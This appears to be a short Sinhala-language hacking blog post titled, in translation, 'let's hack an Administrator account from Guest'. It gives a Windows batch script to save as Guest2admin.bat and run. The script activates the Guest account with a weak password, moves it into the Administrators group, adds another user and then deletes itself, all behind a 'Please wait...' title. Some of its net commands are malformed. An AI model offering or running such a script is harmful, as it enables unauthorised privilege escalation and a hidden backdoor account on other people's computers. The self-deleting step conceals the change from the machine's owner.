Posted by : GAL_MAINA
හම්මෙ ද දවසෙ මම වඩිය කතා කරන එක නවත්තන්න හිතුවා මොකද අද දවස වැඩ වැඩි දවසක් :) හරි දැන් වඩෙට එමුකො :)
පළමුව notepad එක open කර ගන්න.
මෙ මම් පහලින් දාලා තියෙන ටික නෝට් පැඩ් එකෙ ටයිප් කරගන්න :)
echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
ඊළගට Guest2admin.bat කියන නමින් save කරන්න .
Run කරන්න.
Related Posts :
- Back to Home »
- Hacking වැඩ »
- Guest ඉදන් Administrator Account එකක් Hack කරමු